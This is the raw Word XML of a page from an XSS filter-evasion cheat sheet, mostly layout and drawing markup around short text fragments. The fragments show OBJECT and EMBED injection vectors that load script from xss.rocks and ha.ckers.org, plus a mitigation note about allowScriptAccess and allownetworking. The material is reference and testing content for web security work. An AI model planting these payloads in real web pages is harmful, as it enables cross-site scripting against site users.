                              <a:gd name="T30" fmla="+- 0 166 166"/>
                              <a:gd name="T31" fmla="*/ 166 h 183"/>
                              <a:gd name="T32" fmla="+- 0 8431 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 6817"/>
                              <a:gd name="T34" fmla="+- 0 187 166"/>
                              <a:gd name="T35" fmla="*/ 187 h 183"/>
                              <a:gd name="T36" fmla="+- 0 8431 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 6817"/>
                              <a:gd name="T38" fmla="+- 0 327 166"/>
                              <a:gd name="T39" fmla="*/ 327 h 183"/>
                              <a:gd name="T40" fmla="+- 0 8413 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 6817"/>
                              <a:gd name="T42" fmla="+- 0 347 166"/>
                              <a:gd name="T43" fmla="*/ 347 h 183"/>
                              <a:gd name="T44" fmla="+- 0 8409 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 6817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817" h="183">
                                <a:moveTo>
                                  <a:pt x="679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795" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6817" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6817" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6799" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="679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Text Box 69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681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&lt;OBJECT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TYPE="text/x-scriptlet"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DATA="</w:t>
                              </w:r>
                              <w:hyperlink r:id="rId39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http://xss.rocks/scriptlet.html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"&gt;&lt;/OBJECT&gt;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6" o:spid="_x0000_s1734" style="position:absolute;margin-left:80.7pt;margin-top:8.3pt;width:340.85pt;height:9.15pt;z-index:-15603712;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,166" coordsize="681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">
                <v:shape id="Freeform 698" o:spid="_x0000_s1735" style="position:absolute;left:1614;top:165;width:6817;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="681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+96MUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/IEb3VTwVCjq5QQRSjYNrYHb4/s&#10;azY0+zZktxr/vSsUehxm5htmtRlsK87U+8axgqdpAoK4crrhWsHncfv4DMIHZI2tY1JwJQ+b9ehh&#10;hZl2F/6gcxlqESHsM1RgQugyKX1lyKKfuo44et+utxii7Gupe7xEuG3lLElSabHhuGCwo9xQ9VP+&#10;WgWvBc7NTu6/irLqktOcyvfDW67UZDy8LEEEGsJ/+K+91wrSRQr3M/EI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73oxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m6795,182l21,182r-3,-1l,161r,-4l,21,21,,6795,r22,21l6817,161r-18,20l6795,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="6795,348;21,348;18,347;0,327;0,323;0,187;21,166;6795,166;6817,187;6817,327;6799,347;6795,348" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 697" o:spid="_x0000_s1736" type="#_x0000_t202" style="position:absolute;left:1614;top:165;width:681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RecUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74X+h+UJvdWNHtKauooUBaEgxnjw+Jp9&#10;JovZtzG7avz3XaHgcZiZb5jpvLeNuFLnjWMFo2ECgrh02nClYF+s3j9B+ICssXFMCu7kYT57fZli&#10;pt2Nc7ruQiUihH2GCuoQ2kxKX9Zk0Q9dSxy9o+sshii7SuoObxFuGzlOklRaNBwXamzpu6bytLtY&#10;BYsD50tz3vxu82NuimKS8E96Uupt0C++QATqwzP8315rBenkAx5n4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l5F5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&lt;OBJECT</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="8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TYPE="text/x-scriptlet"</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="8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DATA="</w:t>
                        </w:r>
                        <w:hyperlink r:id="rId40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http://xss.rocks/scriptlet.html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"&gt;&lt;/OBJECT&gt;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EMBED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Flash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Movie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XSS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59200" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>3764280</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>551815</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1443355" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="692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3355" cy="116205"/>
                          <a:chOff x="5928" y="869"/>
                          <a:chExt cx="2273" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="693" name="Freeform 695"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="5927" y="868"/>
                            <a:ext cx="2273" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 8179 5928"/>
                              <a:gd name="T1" fmla="*/ T0 w 2273"/>
                              <a:gd name="T2" fmla="+- 0 1051 869"/>
                              <a:gd name="T3" fmla="*/ 1051 h 183"/>
                              <a:gd name="T4" fmla="+- 0 5949 5928"/>
                              <a:gd name="T5" fmla="*/ T4 w 2273"/>
                              <a:gd name="T6" fmla="+- 0 1051 869"/>
                              <a:gd name="T7" fmla="*/ 1051 h 183"/>
                              <a:gd name="T8" fmla="+- 0 5946 5928"/>
                              <a:gd name="T9" fmla="*/ T8 w 2273"/>
                              <a:gd name="T10" fmla="+- 0 1050 869"/>
                              <a:gd name="T11" fmla="*/ 1050 h 183"/>
                              <a:gd name="T12" fmla="+- 0 5928 5928"/>
                              <a:gd name="T13" fmla="*/ T12 w 2273"/>
                              <a:gd name="T14" fmla="+- 0 1030 869"/>
                              <a:gd name="T15" fmla="*/ 1030 h 183"/>
                              <a:gd name="T16" fmla="+- 0 5928 5928"/>
                              <a:gd name="T17" fmla="*/ T16 w 2273"/>
                              <a:gd name="T18" fmla="+- 0 1027 869"/>
                              <a:gd name="T19" fmla="*/ 1027 h 183"/>
                              <a:gd name="T20" fmla="+- 0 5928 5928"/>
                              <a:gd name="T21" fmla="*/ T20 w 2273"/>
                              <a:gd name="T22" fmla="+- 0 890 869"/>
                              <a:gd name="T23" fmla="*/ 890 h 183"/>
                              <a:gd name="T24" fmla="+- 0 5949 5928"/>
                              <a:gd name="T25" fmla="*/ T24 w 2273"/>
                              <a:gd name="T26" fmla="+- 0 869 869"/>
                              <a:gd name="T27" fmla="*/ 869 h 183"/>
                              <a:gd name="T28" fmla="+- 0 8179 5928"/>
                              <a:gd name="T29" fmla="*/ T28 w 2273"/>
                              <a:gd name="T30" fmla="+- 0 869 869"/>
                              <a:gd name="T31" fmla="*/ 869 h 183"/>
                              <a:gd name="T32" fmla="+- 0 8200 5928"/>
                              <a:gd name="T33" fmla="*/ T32 w 2273"/>
                              <a:gd name="T34" fmla="+- 0 890 869"/>
                              <a:gd name="T35" fmla="*/ 890 h 183"/>
                              <a:gd name="T36" fmla="+- 0 8200 5928"/>
                              <a:gd name="T37" fmla="*/ T36 w 2273"/>
                              <a:gd name="T38" fmla="+- 0 1030 869"/>
                              <a:gd name="T39" fmla="*/ 1030 h 183"/>
                              <a:gd name="T40" fmla="+- 0 8182 5928"/>
                              <a:gd name="T41" fmla="*/ T40 w 2273"/>
                              <a:gd name="T42" fmla="+- 0 1050 869"/>
                              <a:gd name="T43" fmla="*/ 1050 h 183"/>
                              <a:gd name="T44" fmla="+- 0 8179 5928"/>
                              <a:gd name="T45" fmla="*/ T44 w 2273"/>
                              <a:gd name="T46" fmla="+- 0 1051 869"/>
                              <a:gd name="T47" fmla="*/ 105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73" h="183">
                                <a:moveTo>
                                  <a:pt x="225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251" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2272" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2272" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2254" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="225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Text Box 694"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="5927" y="868"/>
                            <a:ext cx="227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41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allownetworking="internal"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3" o:spid="_x0000_s1737" style="position:absolute;left:0;text-align:left;margin-left:296.4pt;margin-top:43.45pt;width:113.65pt;height:9.15pt;z-index:15859200;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="5928,869" coordsize="2273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">
                <v:shape id="Freeform 695" o:spid="_x0000_s1738" style="position:absolute;left:5927;top:868;width:2273;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="2273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bihsQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQYvCMBSE7wv+h/AEb2vqCrLWpqLCoh5k0RXB26N5&#10;tsXmpTSx1n9vBGGPw8x8wyTzzlSipcaVlhWMhhEI4szqknMFx7+fz28QziNrrCyTggc5mKe9jwRj&#10;be+8p/bgcxEg7GJUUHhfx1K6rCCDbmhr4uBdbGPQB9nkUjd4D3BTya8omkiDJYeFAmtaFZRdDzej&#10;oFxuf0fnk5W8e6zbcbXX5w1OlRr0u8UMhKfO/4ff7Y1WMJmO4XUmHAGZ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m4obEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m2251,182l21,182r-3,-1l,161r,-3l,21,21,,2251,r21,21l2272,161r-18,20l2251,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="2251,1051;21,1051;18,1050;0,1030;0,1027;0,890;21,869;2251,869;2272,890;2272,1030;2254,1050;2251,1051" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 694" o:spid="_x0000_s1739" type="#_x0000_t202" style="position:absolute;left:5927;top:868;width:2273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UPDsUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE70L/w/KE3nSjlFBTV5GiIBSKMR48vmaf&#10;yWL2bcyumv77rlDwOMzMN8x82dtG3KjzxrGCyTgBQVw6bbhScCg2o3cQPiBrbByTgl/ysFy8DOaY&#10;aXfnnG77UIkIYZ+hgjqENpPSlzVZ9GPXEkfv5DqLIcqukrrDe4TbRk6TJJUWDceFGlv6rKk8769W&#10;werI+dpcvn92+Sk3RTFL+Cs9K/U67FcfIAL14Rn+b2+1gnT2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RQ8O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41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allownetworking="internal"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Click</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>here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demo:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>~~</w:t>
      </w:r>
      <w:hyperlink r:id="rId41">
        <w:r>
          <w:t>http://ha.ckers.org/xss.swf~~</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="9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1328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4112260" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="689" name="Group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12260" cy="116205"/>
                          <a:chOff x="1614" y="240"/>
                          <a:chExt cx="6476" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="690" name="Freeform 692"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="240"/>
                            <a:ext cx="6476" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 8069 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 6476"/>
                              <a:gd name="T2" fmla="+- 0 422 240"/>
                              <a:gd name="T3" fmla="*/ 422 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 6476"/>
                              <a:gd name="T6" fmla="+- 0 422 240"/>
                              <a:gd name="T7" fmla="*/ 422 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 6476"/>
                              <a:gd name="T10" fmla="+- 0 422 240"/>
                              <a:gd name="T11" fmla="*/ 422 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 6476"/>
                              <a:gd name="T14" fmla="+- 0 401 240"/>
                              <a:gd name="T15" fmla="*/ 401 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 6476"/>
                              <a:gd name="T18" fmla="+- 0 398 240"/>
                              <a:gd name="T19" fmla="*/ 398 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 6476"/>
                              <a:gd name="T22" fmla="+- 0 261 240"/>
                              <a:gd name="T23" fmla="*/ 261 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 6476"/>
                              <a:gd name="T26" fmla="+- 0 240 240"/>
                              <a:gd name="T27" fmla="*/ 240 h 183"/>
                              <a:gd name="T28" fmla="+- 0 8069 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 6476"/>
                              <a:gd name="T30" fmla="+- 0 240 240"/>
                              <a:gd name="T31" fmla="*/ 240 h 183"/>
                              <a:gd name="T32" fmla="+- 0 8090 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 6476"/>
                              <a:gd name="T34" fmla="+- 0 261 240"/>
                              <a:gd name="T35" fmla="*/ 261 h 183"/>
                              <a:gd name="T36" fmla="+- 0 8090 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 6476"/>
                              <a:gd name="T38" fmla="+- 0 401 240"/>
                              <a:gd name="T39" fmla="*/ 401 h 183"/>
                              <a:gd name="T40" fmla="+- 0 8072 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 6476"/>
                              <a:gd name="T42" fmla="+- 0 422 240"/>
                              <a:gd name="T43" fmla="*/ 422 h 183"/>
                              <a:gd name="T44" fmla="+- 0 8069 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 6476"/>
                              <a:gd name="T46" fmla="+- 0 422 240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476" h="183">
                                <a:moveTo>
                                  <a:pt x="645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455" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6476" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6476" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6458" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="645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Text Box 691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0"/>
                            <a:ext cx="647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&lt;EMBED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</w:t>
                              </w:r>
                              <w:hyperlink r:id="rId42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http://ha.ckers.org/xss.swf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AllowScriptAccess="always"&gt;&lt;/EMBED&gt;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0" o:spid="_x0000_s1740" style="position:absolute;margin-left:80.7pt;margin-top:12pt;width:323.8pt;height:9.15pt;z-index:-15603200;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,240" coordsize="647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">
                <v:shape id="Freeform 692" o:spid="_x0000_s1741" style="position:absolute;left:1614;top:240;width:6476;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="64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1VdMMA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPy4rCMBTdC/5DuII7TR3BRzXKzMjADCJqdePu0lzb&#10;YnNTmqgdv94sBJeH854vG1OKG9WusKxg0I9AEKdWF5wpOB5+ehMQziNrLC2Tgn9ysFy0W3OMtb3z&#10;nm6Jz0QIYRejgtz7KpbSpTkZdH1bEQfubGuDPsA6k7rGewg3pfyIopE0WHBoyLGi75zSS3I1CpLr&#10;avs33FTH8e5ruzq5wbh8TNdKdTvN5wyEp8a/xS/3r1Ywmob54Uw4An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1VdMMAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m6455,182l21,182r-3,l,161r,-3l,21,21,,6455,r21,21l6476,161r-18,21l6455,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="6455,422;21,422;18,422;0,401;0,398;0,261;21,240;6455,240;6476,261;6476,401;6458,422;6455,422" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 691" o:spid="_x0000_s1742" type="#_x0000_t202" style="position:absolute;left:1614;top:240;width:647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KslsQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/KE3upGD6FGVxFREAqlMR48PrPP&#10;ZDH7NmZXTf99tyB4HGbmG2a+7G0j7tR541jBeJSAIC6dNlwpOBTbj08QPiBrbByTgl/ysFwM3uaY&#10;affgnO77UIkIYZ+hgjqENpPSlzVZ9CPXEkfv7DqLIcqukrrDR4TbRk6SJJUWDceFGlta11Re9jer&#10;YHXkfGOu36ef/Jybopgm/JVelHof9qsZiEB9eIWf7Z1WkE7H8H8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yrJb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&lt;EMBED</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="8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</w:t>
                        </w:r>
                        <w:hyperlink r:id="rId43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http://ha.ckers.org/xss.swf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</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="8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AllowScriptAccess="always"&gt;&lt;/EMBED&gt;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9"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="9"/>
        </w:rPr>
        <w:sectPr w:rsidR="00AC7743">
          <w:pgSz w:w="11920" w:h="16860"/>
          <w:pgMar w:top="136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102"/>
        <w:ind w:left="154"/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15858688" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>2159000</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>68580</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1381125" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="686" name="Group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1125" cy="116205"/>
                          <a:chOff x="3400" y="108"/>
                          <a:chExt cx="2175" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="687" name="Freeform 689"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="3400" y="108"/>
                            <a:ext cx="2175" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 5554 3400"/>
                              <a:gd name="T1" fmla="*/ T0 w 2175"/>
                              <a:gd name="T2" fmla="+- 0 290 108"/>
                              <a:gd name="T3" fmla="*/ 290 h 183"/>
                              <a:gd name="T4" fmla="+- 0 3422 3400"/>
                              <a:gd name="T5" fmla="*/ T4 w 2175"/>
                              <a:gd name="T6" fmla="+- 0 290 108"/>
                              <a:gd name="T7" fmla="*/ 290 h 183"/>
                              <a:gd name="T8" fmla="+- 0 3418 3400"/>
                              <a:gd name="T9" fmla="*/ T8 w 2175"/>
                              <a:gd name="T10" fmla="+- 0 290 108"/>
                              <a:gd name="T11" fmla="*/ 290 h 183"/>
                              <a:gd name="T12" fmla="+- 0 3400 3400"/>
                              <a:gd name="T13" fmla="*/ T12 w 2175"/>
                              <a:gd name="T14" fmla="+- 0 269 108"/>
                              <a:gd name="T15" fmla="*/ 269 h 183"/>
                              <a:gd name="T16" fmla="+- 0 3400 3400"/>
                              <a:gd name="T17" fmla="*/ T16 w 2175"/>
                              <a:gd name="T18" fmla="+- 0 266 108"/>
                              <a:gd name="T19" fmla="*/ 266 h 183"/>
                              <a:gd name="T20" fmla="+- 0 3400 3400"/>
                              <a:gd name="T21" fmla="*/ T20 w 2175"/>
                              <a:gd name="T22" fmla="+- 0 129 108"/>
                              <a:gd name="T23" fmla="*/ 129 h 183"/>
                              <a:gd name="T24" fmla="+- 0 3422 3400"/>
                              <a:gd name="T25" fmla="*/ T24 w 2175"/>
                              <a:gd name="T26" fmla="+- 0 108 108"/>
                              <a:gd name="T27" fmla="*/ 108 h 183"/>
                              <a:gd name="T28" fmla="+- 0 5554 3400"/>
                              <a:gd name="T29" fmla="*/ T28 w 2175"/>
                              <a:gd name="T30" fmla="+- 0 108 108"/>
                              <a:gd name="T31" fmla="*/ 108 h 183"/>
                              <a:gd name="T32" fmla="+- 0 5575 3400"/>
                              <a:gd name="T33" fmla="*/ T32 w 2175"/>
                              <a:gd name="T34" fmla="+- 0 129 108"/>
                              <a:gd name="T35" fmla="*/ 129 h 183"/>
                              <a:gd name="T36" fmla="+- 0 5575 3400"/>
                              <a:gd name="T37" fmla="*/ T36 w 2175"/>
                              <a:gd name="T38" fmla="+- 0 269 108"/>
                              <a:gd name="T39" fmla="*/ 269 h 183"/>
                              <a:gd name="T40" fmla="+- 0 5557 3400"/>
                              <a:gd name="T41" fmla="*/ T40 w 2175"/>
                              <a:gd name="T42" fmla="+- 0 290 108"/>
                              <a:gd name="T43" fmla="*/ 290 h 183"/>
                              <a:gd name="T44" fmla="+- 0 5554 3400"/>
                              <a:gd name="T45" fmla="*/ T44 w 2175"/>
                              <a:gd name="T46" fmla="+- 0 290 108"/>
                              <a:gd name="T47" fmla="*/ 29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175" h="183">
                                <a:moveTo>
                                  <a:pt x="2154" y="182"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="22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lnTo>
                                  <a:pt x="2154" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2175" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2175" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2157" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="215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Text Box 688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108"/>
                            <a:ext cx="217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2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allowScriptAccess="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never"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7" o:spid="_x0000_s1743" style="position:absolute;left:0;text-align:left;margin-left:170pt;margin-top:5.4pt;width:108.75pt;height:9.15pt;z-index:15858688;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="3400,108" coordsize="217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">
                <v:shape id="Freeform 689" o:spid="_x0000_s1744" style="position:absolute;left:3400;top:108;width:2175;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="217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Wb8YA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWsCMRSE7wX/Q3hCbzWrlFW2RpFSaQ89uOqhvT02&#10;r8m2m5d1k+r6740geBxm5htmvuxdI47UhdqzgvEoA0FceV2zUbDfrZ9mIEJE1th4JgVnCrBcDB7m&#10;WGh/4pKO22hEgnAoUIGNsS2kDJUlh2HkW+Lk/fjOYUyyM1J3eEpw18hJluXSYc1pwWJLr5aqv+2/&#10;U/D1ebBvm3f/W343Rj6vc3vemVKpx2G/egERqY/38K39oRXksylcz6Qj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CWb8YAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" path="m2154,182l22,182r-4,l,161r,-3l,21,22,,2154,r21,21l2175,161r-18,21l2154,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="2154,290;22,290;18,290;0,269;0,266;0,129;22,108;2154,108;2175,129;2175,269;2157,290;2154,290" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 688" o:spid="_x0000_s1745" type="#_x0000_t202" style="position:absolute;left:3400;top:108;width:217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GT1sMA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPPWvDMBDdA/0P4gLdYjkdTOJaMSG0UCiUOs7Q8WJd&#10;bGHr5Fpq4v77aihkfLzvopztIK40eeNYwTpJQRA3ThtuFZzq19UGhA/IGgfHpOCXPJS7h0WBuXY3&#10;ruh6DK2IIexzVNCFMOZS+qYjiz5xI3HkLm6yGCKcWqknvMVwO8inNM2kRcOxocORDh01/fHHKth/&#10;cfVivj/On9WlMnW9Tfk965V6XM77ZxCB5nAX/7vftIJsE9fGM/EI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GT1s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2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allowScriptAccess="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never"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If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add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attributes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="75"/>
        <w:ind w:left="154"/>
      </w:pPr>
      <w:r>
        <w:t>(thank</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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Jonathan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Vanasco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info).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
        <w:spacing w:before="1"/>
      </w:pPr>
      <w:r>
        <w:t>EMBED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>SVG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XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Vector</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:spacing w:before="102"/>
        <w:ind w:left="154"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>and</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="102"/>
        <w:ind w:left="154"/>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>it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mitigate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risk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num="3" w:space="708" w:equalWidth="0">
            <w:col w:w="3811" w:space="192"/>
            <w:col w:w="469" w:space="2151"/>
            <w:col w:w="2397"/>
          </w:cols>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="102" w:line="319" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="304"/>
      </w:pPr>
      <w:r>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>example</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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works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Firefox,</w:t>
      </w:r>
